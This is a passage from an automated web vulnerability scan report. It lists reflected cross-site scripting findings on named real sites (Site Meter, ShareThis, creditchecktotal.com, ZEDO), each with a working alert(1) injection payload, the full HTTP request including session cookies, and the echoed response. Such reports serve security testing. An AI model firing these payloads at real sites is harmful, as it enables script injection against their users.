Set-Cookie: FFcat=809,1050,9:809,1050,21;expires=Mon, 25 Apr 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFad=0:0;expires=Mon, 25 Apr 2011 05:00:00 GMT;domain=.zedo.com;path=/;
ETag: "426044b-838c-4a12b036d4100"
Vary: Accept-Encoding
X-Varnish: 920078456
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=168
Expires: Sun, 24 Apr 2011 16:50:21 GMT
Date: Sun, 24 Apr 2011 16:47:33 GMT
Connection: close
Content-Length: 2191

// Copyright (c) 2000-2011 ZEDO Inc. All Rights Reserved.

var p9=new Image();


var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=376;var zzPat='homepager
...[SNIP]...
TcGt89Z-t7Q0A2jzc9p9~0424114ee7c"-alert(1)-"688e5a4f52f';

var zzhasAd=undefined;


                                                                       var zzStr = "s=376;u=xlO0TcGt89Z-t7Q0A2jzc9p9~0424114ee7c"-alert(1)-"688e5a4f52f;z=" + Math.random();
var ainfo = "";

var zzDate = new Date();
var zzWindow;
var zzURL;
if (typeof zzCustom =='undefined'){var zzIdxCustom ='';}
else{var zzIdxCustom = zzCustom;}
if (typeof zzTrd
...[SNIP]...

6.431. http://s18.sitemeter.com/js/counter.asp [IP cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://s18.sitemeter.com
Path:   /js/counter.asp

Issue detail

The value of the IP cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8c3c5"%3balert(1)//6ad7de2f5ca was submitted in the IP cookie. This input was echoed as 8c3c5";alert(1)//6ad7de2f5ca in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /js/counter.asp?site=s18neumedia HTTP/1.1
Host: s18.sitemeter.com
Proxy-Connection: keep-alive
Referer: http://www.neudesicmediagroup.com/publishers.aspx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: IP=173%2E193%2E214%2E2438c3c5"%3balert(1)//6ad7de2f5ca

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 24 Apr 2011 17:00:21 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
P3P: policyref="/w3c/p3pEXTRA.xml", CP="NOI DSP COR NID ADM DEV PSA OUR IND UNI PUR COM NAV INT STA"
Content-Length: 7292
Content-Type: application/x-javascript
Expires: Sun, 24 Apr 2011 17:10:21 GMT
Cache-control: private

// Copyright (c)2006 Site Meter, Inc.
// <![CDATA[
var SiteMeter =
{
   init:function( sCodeName, sServerName, sSecurityCode )
   {
       SiteMeter.CodeName = sCodeName;
       SiteMeter.ServerName = sServerName;
       SiteMeter.SecurityCode = sSecurityCode;
       SiteMeter.IP = "173.193.214.2438c3c5";alert(1)//6ad7de2f5ca";
       SiteMeter.trackingImage = new Image();
       SiteMeter.dgOutlinkImage = new Image();

       if (typeof(g_sLastCodeName) != 'undefined')
           if (g_sLastCodeName == sCodeName)
               return;

       SiteMete
...[SNIP]...

6.432. http://s18.sitemeter.com/js/counter.js [IP cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://s18.sitemeter.com
Path:   /js/counter.js

Issue detail

The value of the IP cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f37a0"%3balert(1)//ea3104fe148 was submitted in the IP cookie. This input was echoed as f37a0";alert(1)//ea3104fe148 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /js/counter.js?site=s18neumedia HTTP/1.1
Host: s18.sitemeter.com
Proxy-Connection: keep-alive
Referer: http://www.neudesicmediagroup.com/publishers.aspx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: IP=173%2E193%2E214%2E243f37a0"%3balert(1)//ea3104fe148

Response (redirected)

HTTP/1.1 200 OK
Connection: close
Date: Sun, 24 Apr 2011 17:00:17 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
P3P: policyref="/w3c/p3pEXTRA.xml", CP="NOI DSP COR NID ADM DEV PSA OUR IND UNI PUR COM NAV INT STA"
Content-Length: 7292
Content-Type: application/x-javascript
Expires: Sun, 24 Apr 2011 17:10:17 GMT
Cache-control: private

// Copyright (c)2006 Site Meter, Inc.
// <![CDATA[
var SiteMeter =
{
   init:function( sCodeName, sServerName, sSecurityCode )
   {
       SiteMeter.CodeName = sCodeName;
       SiteMeter.ServerName = sServerName;
       SiteMeter.SecurityCode = sSecurityCode;
       SiteMeter.IP = "173.193.214.243f37a0";alert(1)//ea3104fe148";
       SiteMeter.trackingImage = new Image();
       SiteMeter.dgOutlinkImage = new Image();

       if (typeof(g_sLastCodeName) != 'undefined')
           if (g_sLastCodeName == sCodeName)
               return;

       SiteMete
...[SNIP]...

6.433. http://seg.sharethis.com/getSegment.php [__stid cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://seg.sharethis.com
Path:   /getSegment.php

Issue detail

The value of the __stid cookie is copied into the HTML document as plain text between tags. The payload eba88<script>alert(1)</script>be0d07d00d1 was submitted in the __stid cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /getSegment.php?purl=http%3A%2F%2Fwww.identitymanagement.com%2F%3F_kk%3Didentity%2520management%26_kt%3Dd37d8c67-315a-4919-abfc-41011051bd9e%26gclid%3DCJvKs4D1tagCFeJ95Qodoi78Dg&jsref=&rnd=1303674262257 HTTP/1.1
Host: seg.sharethis.com
Proxy-Connection: keep-alive
Referer: http://www.identitymanagement.com/?_kk=identity%20management&_kt=d37d8c67-315a-4919-abfc-41011051bd9e&gclid=CJvKs4D1tagCFeJ95Qodoi78Dg
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __stid=CspT702sdV9LL0aNgCmJAg==eba88<script>alert(1)</script>be0d07d00d1; __switchTo5x=64; __utmz=79367510.1303478681.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __unam=8f891fa-12f7d623a1f-609dccbc-23; __utma=79367510.1475296623.1303478681.1303478681.1303478681.1

Response

HTTP/1.1 200 OK
Server: nginx/0.8.47
Date: Sun, 24 Apr 2011 19:46:09 GMT
Content-Type: text/html
Connection: keep-alive
X-Powered-By: PHP/5.3.3
P3P: "policyref="/w3c/p3p.xml", CP="ALL DSP COR CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV INT DEM"
Content-Length: 1368


           <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
           <html>
           <head>
           <meta http-equiv="Content-type" content="text/html;charset=UTF-8">
           
...[SNIP]...
<div style='display:none'>clicookie:CspT702sdV9LL0aNgCmJAg==eba88<script>alert(1)</script>be0d07d00d1
userid:
</div>
...[SNIP]...

6.434. http://www.creditchecktotal.com/Login.aspx [SiteID parameter]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.creditchecktotal.com
Path:   /Login.aspx

Issue detail

The value of the SiteID request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 75b86'style%3d'x%3aexpression(alert(1))'2ae170cb00e was submitted in the SiteID parameter. This input was echoed as 75b86'style='x:expression(alert(1))'2ae170cb00e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /Login.aspx?SiteVersionID=693&SiteID=10024475b86'style%3d'x%3aexpression(alert(1))'2ae170cb00e&sc=668032&bcd=TotalCompare HTTP/1.1
Host: www.creditchecktotal.com
Proxy-Connection: keep-alive
Referer: http://www.creditchecktotal.com/default.aspx?sc=668032&bcd=TotalCompare
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=whbgr034pldyk3irdmpf0155; MachineName=IRC-P2WEB-10; NavFlowID=; NumTrialDaysLeft=; UID=cf0a6e23928a43479df1fd6afa35c72f; BIGipServercreditchecktotal-web-pool=175001098.22559.0000; OriginalReferrer=creditchecktotal.com; MachineName=IRC-P2WEB-10; OriginalReferrer=; NavigationPath=Default; LastVisitDate=4/24/2011 1:45:13 PM; NavFlowID=; NumTrialDaysLeft=; UID=d4d0a4af417e4b0abab60afe27705d90; NavigationPath=default+Message?PageTypeID=Contact Us+Message?PageTypeID=8d0a919d42899a53d56096c1+Message?PageTypeID=Contact Us8d0a919dbf39ce027681377b+Message?PageTypeID=Contact Us+Default+Message?PageTypeID=Contact Us+Default+Message?PageTypeID=Contact Us+Default+Message?PageTypeID=Contact Us+Default+Message?PageTypeID=Contact Us+Default+Message?PageTypeID=Contact Us+Default+Message?PageTypeID=Contact Us+Default+Message?PageTypeID=Contact Us+Default+Message?PageTypeID=Contact Us+Default+Message?PageTypeID=Contact Us+Default+Message?PageTypeID=Contact Us+Default+Message?PageTypeID=Contact Us+Order1+Message?PageTypeID=Contact Us+Default+Message?PageTypeID=Contact Us+Default+Order1+Message?PageTypeID=Contact Us+Default+Order1+Message?PageTypeID=Contact Us+Default+Order1+Default+Message?PageTypeID=Contact Us+Order1+Default+Error+Default+Order1+Error+Default+Message?PageTypeID=Contact Us+Order1+Default+Order1+Default+Order1+Default+Order1+Default+Order1+Default+Order1+Default+Order1+Default+Order1+Default+Order1; LastVisitDate=4/24/2011 1:45:57 PM

Response

HTTP/1.1 302 Found
Connection: close
Date: Sun, 24 Apr 2011 20:50:04 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 1.1.4322
Location: https://www.creditchecktotal.com/Login.aspx?SiteVersionID=693&SiteID=10024475b86'style='x:expression(alert(1))'2ae170cb00e&sc=668032&bcd=TotalCompare
Content-Type: text/html; charset=utf-8
Cache-Control: private
X-PvInfo: [S10203.C64259.A70594.RA0.G11457.U69A2456C].[OT/html.OG/pages]
Vary: Accept-Encoding
Accept-Ranges: none

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href='https://www.creditchecktotal.com/Login.aspx?SiteVersionID=693&amp;SiteID=10024475b86'style='x:expression(alert(1))'2ae170cb00e&amp;sc=668032&amp;bcd=TotalCompare'>
...[SNIP]...

6.435. http://www.creditchecktotal.com/Login.aspx [SiteVersionID parameter]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.creditchecktotal.com
Path:   /Login.aspx

Issue detail

The value of the SiteVersionID request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 1222e'style%3d'x%3aexpression(alert(1))'745efaac22b was submitted in the SiteVersionID parameter. This input was echoed as 1222e'style='x:expression(alert(1))'745efaac22b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /Login.aspx?SiteVersionID=6931222e'style%3d'x%3aexpression(alert(1))'745efaac22b&SiteID=100244&sc=668032&bcd=TotalCompare HTTP/1.1
Host: www.creditchecktotal.com
Proxy-Connection: keep-alive
Referer: http://www.creditchecktotal.com/default.aspx?sc=668032&bcd=TotalCompare
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=whbgr034pldyk3irdmpf0155; MachineName=IRC-P2WEB-10; NavFlowID=; NumTrialDaysLeft=; UID=cf0a6e23928a43479df1fd6afa35c72f; BIGipServercreditchecktotal-web-pool=175001098.22559.0000; OriginalReferrer=creditchecktotal.com; MachineName=IRC-P2WEB-10; OriginalReferrer=; NavigationPath=Default; LastVisitDate=4/24/2011 1:45:13 PM; NavFlowID=; NumTrialDaysLeft=; UID=d4d0a4af417e4b0abab60afe27705d90; NavigationPath=default+Message?PageTypeID=Contact Us+Message?PageTypeID=8d0a919d42899a53d56096c1+Message?PageTypeID=Contact Us8d0a919dbf39ce027681377b+Message?PageTypeID=Contact Us+Default+Message?PageTypeID=Contact Us+Default+Message?PageTypeID=Contact Us+Default+Message?PageTypeID=Contact Us+Default+Message?PageTypeID=Contact Us+Default+Message?PageTypeID=Contact Us+Default+Message?PageTypeID=Contact Us+Default+Message?PageTypeID=Contact Us+Default+Message?PageTypeID=Contact Us+Default+Message?PageTypeID=Contact Us+Default+Message?PageTypeID=Contact Us+Default+Message?PageTypeID=Contact Us+Order1+Message?PageTypeID=Contact Us+Default+Message?PageTypeID=Contact Us+Default+Order1+Message?PageTypeID=Contact Us+Default+Order1+Message?PageTypeID=Contact Us+Default+Order1+Default+Message?PageTypeID=Contact Us+Order1+Default+Error+Default+Order1+Error+Default+Message?PageTypeID=Contact Us+Order1+Default+Order1+Default+Order1+Default+Order1+Default+Order1+Default+Order1+Default+Order1+Default+Order1+Default+Order1; LastVisitDate=4/24/2011 1:45:57 PM

Response

HTTP/1.1 302 Found
Connection: close
Date: Sun, 24 Apr 2011 20:46:49 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 1.1.4322
Location: https://www.creditchecktotal.com/Login.aspx?SiteVersionID=6931222e'style='x:expression(alert(1))'745efaac22b&SiteID=100244&sc=668032&bcd=TotalCompare
Content-Type: text/html; charset=utf-8
Cache-Control: private
X-PvInfo: [S10203.C64259.A70594.RA0.G11457.U4A110837].[OT/html.OG/pages]
Vary: Accept-Encoding
Accept-Ranges: none

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href='https://www.creditchecktotal.com/Login.aspx?SiteVersionID=6931222e'style='x:expression(alert(1))'745efaac22b&amp;SiteID=100244&amp;sc=668032&amp;bcd=TotalCompare'>
...[SNIP]...

6.436. http://www.creditchecktotal.com/Login.aspx [bcd parameter]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.creditchecktotal.com
Path:   /Login.aspx

Issue detail

The value of the bcd request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload b195a'style%3d'x%3aexpression(alert(1))'e9ddc36472e was submitted in the bcd parameter. This input was echoed as b195a'style='x:expression(alert(1))'e9ddc36472e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /Login.aspx?SiteVersionID=693&SiteID=100244&sc=668032&bcd=TotalCompareb195a'style%3d'x%3aexpression(alert(1))'e9ddc36472e HTTP/1.1
Host: www.creditchecktotal.com
Proxy-Connection: keep-alive
Referer: http://www.creditchecktotal.com/default.aspx?sc=668032&bcd=TotalCompare
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=whbgr034pldyk3irdmpf0155; MachineName=IRC-P2WEB-10; NavFlowID=; NumTrialDaysLeft=; UID=cf0a6e23928a43479df1fd6afa35c72f; BIGipServercreditchecktotal-web-pool=175001098.22559.0000; OriginalReferrer=creditchecktotal.com; MachineName=IRC-P2WEB-10; OriginalReferrer=; NavigationPath=Default; LastVisitDate=4/24/2011 1:45:13 PM; NavFlowID=; NumTrialDaysLeft=; UID=d4d0a4af417e4b0abab60afe27705d90; NavigationPath=default+Message?PageTypeID=Contact Us+Message?PageTypeID=8d0a919d42899a53d56096c1+Message?PageTypeID=Contact Us8d0a919dbf39ce027681377b+Message?PageTypeID=Contact Us+Default+Message?PageTypeID=Contact Us+Default+Message?PageTypeID=Contact Us+Default+Message?PageTypeID=Contact Us+Default+Message?PageTypeID=Contact Us+Default+Message?PageTypeID=Contact Us+Default+Message?PageTypeID=Contact Us+Default+Message?PageTypeID=Contact Us+Default+Message?PageTypeID=Contact Us+Default+Message?PageTypeID=Contact Us+Default+Message?PageTypeID=Contact Us+Default+Message?PageTypeID=Contact Us+Order1+Message?PageTypeID=Contact Us+Default+Message?PageTypeID=Contact Us+Default+Order1+Message?PageTypeID=Contact Us+Default+Order1+Message?PageTypeID=Contact Us+Default+Order1+Default+Message?PageTypeID=Contact Us+Order1+Default+Error+Default+Order1+Error+Default+Message?PageTypeID=Contact Us+Order1+Default+Order1+Default+Order1+Default+Order1+Default+Order1+Default+Order1+Default+Order1+Default+Order1+Default+Order1; LastVisitDate=4/24/2011 1:45:57 PM

Response

HTTP/1.1 302 Found
Connection: close
Date: Sun, 24 Apr 2011 20:57:01 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 1.1.4322
Location: https://www.creditchecktotal.com/Login.aspx?SiteVersionID=693&SiteID=100244&sc=668032&bcd=TotalCompareb195a'style='x:expression(alert(1))'e9ddc36472e
Content-Type: text/html; charset=utf-8
Cache-Control: private
X-PvInfo: [S10203.C64259.A70594.RA0.G11457.U7265E487].[OT/html.OG/pages]
Vary: Accept-Encoding
Accept-Ranges: none

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href='https://www.creditchecktotal.com/Login.aspx?SiteVersionID=693&amp;SiteID=100244&amp;sc=668032&amp;bcd=TotalCompareb195a'style='x:expression(alert(1))'e9ddc36472e'>
...[SNIP]...

6.437. http://www.creditchecktotal.com/Login.aspx [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.creditchecktotal.com
Path:   /Login.aspx

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 821c5'style%3d'x%3aexpression(alert(1))'9891a29dff0 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 821c5'style='x:expression(alert(1))'9891a29dff0 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /Login.aspx?SiteVersionID=693&SiteID=100244&sc=668032&bcd=TotalCompare&821c5'style%3d'x%3aexpression(alert(1))'9891a29dff0=1 HTTP/1.1
Host: www.creditchecktotal.com
Proxy-Connection: keep-alive
Referer: http://www.creditchecktotal.com/default.aspx?sc=668032&bcd=TotalCompare
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=whbgr034pldyk3irdmpf0155; MachineName=IRC-P2WEB-10; NavFlowID=; NumTrialDaysLeft=; UID=cf0a6e23928a43479df1fd6afa35c72f; BIGipServercreditchecktotal-web-pool=175001098.22559.0000; OriginalReferrer=creditchecktotal.com; MachineName=IRC-P2WEB-10; OriginalReferrer=; NavigationPath=Default; LastVisitDate=4/24/2011 1:45:13 PM; NavFlowID=; NumTrialDaysLeft=; UID=d4d0a4af417e4b0abab60afe27705d90; NavigationPath=default+Message?PageTypeID=Contact Us+Message?PageTypeID=8d0a919d42899a53d56096c1+Message?PageTypeID=Contact Us8d0a919dbf39ce027681377b+Message?PageTypeID=Contact Us+Default+Message?PageTypeID=Contact Us+Default+Message?PageTypeID=Contact Us+Default+Message?PageTypeID=Contact Us+Default+Message?PageTypeID=Contact Us+Default+Message?PageTypeID=Contact Us+Default+Message?PageTypeID=Contact Us+Default+Message?PageTypeID=Contact Us+Default+Message?PageTypeID=Contact Us+Default+Message?PageTypeID=Contact Us+Default+Message?PageTypeID=Contact Us+Default+Message?PageTypeID=Contact Us+Order1+Message?PageTypeID=Contact Us+Default+Message?PageTypeID=Contact Us+Default+Order1+Message?PageTypeID=Contact Us+Default+Order1+Message?PageTypeID=Contact Us+Default+Order1+Default+Message?PageTypeID=Contact Us+Order1+Default+Error+Default+Order1+Error+Default+Message?PageTypeID=Contact Us+Order1+Default+Order1+Default+Order1+Default+Order1+Default+Order1+Default+Order1+Default+Order1+Default+Order1+Default+Order1; LastVisitDate=4/24/2011 1:45:57 PM

Response

HTTP/1.1 302 Found
Connection: close
Date: Sun, 24 Apr 2011 21:02:38 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 1.1.4322
Location: https://www.creditchecktotal.com/Login.aspx?SiteVersionID=693&SiteID=100244&sc=668032&bcd=TotalCompare&821c5'style='x:expression(alert(1))'9891a29dff0=1
Content-Type: text/html; charset=utf-8
Cache-Control: private
X-PvInfo: [S10203.C64259.A70594.RA0.G11457.U697C5256].[OT/html.OG/pages]
Vary: Accept-Encoding
Accept-Ranges: none

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href='https://www.creditchecktotal.com/Login.aspx?SiteVersionID=693&amp;SiteID=100244&amp;sc=668032&amp;bcd=TotalCompare&amp;821c5'style='x:expression(alert(1))'9891a29dff0=1'>
...[SNIP]...

6.438. http://www.creditchecktotal.com/Login.aspx [sc parameter]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.creditchecktotal.com
Path:   /Login.aspx

Issue detail

The value of the sc request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 5510a'style%3d'x%3aexpression(alert(1))'be944b6a34c was submitted in the sc parameter. This input was echoed as 5510a'style='x:expression(alert(1))'be944b6a34c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /Login.aspx?SiteVersionID=693&SiteID=100244&sc=6680325510a'style%3d'x%3aexpression(alert(1))'be944b6a34c&bcd=TotalCompare HTTP/1.1
Host: www.creditchecktotal.com
Proxy-Connection: keep-alive
Referer: http://www.creditchecktotal.com/default.aspx?sc=668032&bcd=TotalCompare
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=whbgr034pldyk3irdmpf0155; MachineName=IRC-P2WEB-10; NavFlowID=; NumTrialDaysLeft=; UID=cf0a6e23928a43479df1fd6afa35c72f; BIGipServercreditchecktotal-web-pool=175001098.22559.0000; OriginalReferrer=creditchecktotal.com; MachineName=IRC-P2WEB-10; OriginalReferrer=; NavigationPath=Default; LastVisitDate=4/24/2011 1:45:13 PM; NavFlowID=; NumTrialDaysLeft=; UID=d4d0a4af417e4b0abab60afe27705d90; NavigationPath=default+Message?PageTypeID=Contact Us+Message?PageTypeID=8d0a919d42899a53d56096c1+Message?PageTypeID=Contact Us8d0a919dbf39ce027681377b+Message?PageTypeID=Contact Us+Default+Message?PageTypeID=Contact Us+Default+Message?PageTypeID=Contact Us+Default+Message?PageTypeID=Contact Us+Default+Message?PageTypeID=Contact Us+Default+Message?PageTypeID=Contact Us+Default+Message?PageTypeID=Contact Us+Default+Message?PageTypeID=Contact Us+Default+Message?PageTypeID=Contact Us+Default+Message?PageTypeID=Contact Us+Default+Message?PageTypeID=Contact Us+Default+Message?PageTypeID=Contact Us+Order1+Message?PageTypeID=Contact Us+Default+Message?PageTypeID=Contact Us+Default+Order1+Message?PageTypeID=Contact Us+Default+Order1+Message?PageTypeID=Contact Us+Default+Order1+Default+Message?PageTypeID=Contact Us+Order1+Default+Error+Default+Order1+Error+Default+Message?PageTypeID=Contact Us+Order1+Default+Order1+Default+Order1+Default+Order1+Default+Order1+Default+Order1+Default+Order1+Default+Order1+Default+Order1; LastVisitDate=4/24/2011 1:45:57 PM

Response

HTTP/1.1 302 Found
Connection: close
Date: Sun, 24 Apr 2011 20:53:54 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 1.1.4322
Location: https://www.creditchecktotal.com/Login.aspx?SiteVersionID=693&SiteID=100244&sc=6680325510a'style='x:expression(alert(1))'be944b6a34c&bcd=TotalCompare
Content-Type: text/html; charset=utf-8
Cache-Control: private
X-PvInfo: [S10203.C64259.A70594.RA0.G11457.UB22930B2].[OT/html.OG/pages]
Vary: Accept-Encoding
Accept-Ranges: none

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href='https://www.creditchecktotal.com/Login.aspx?SiteVersionID=693&amp;SiteID=100244&amp;sc=6680325510a'style='x:expression(alert(1))'be944b6a34c&amp;bcd=TotalCompare'>
...[SNIP]...

6.439. http://www.creditchecktotal.com/Order1.aspx [SiteID parameter]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.creditchecktotal.com
Path:   /Order1.aspx

Issue detail

The value of the SiteID request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 63644'style%3d'x%3aexpression(alert(1))'dec35c3a558 was submitted in the SiteID parameter. This input was echoed as 63644'style='x:expression(alert(1))'dec35c3a558 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

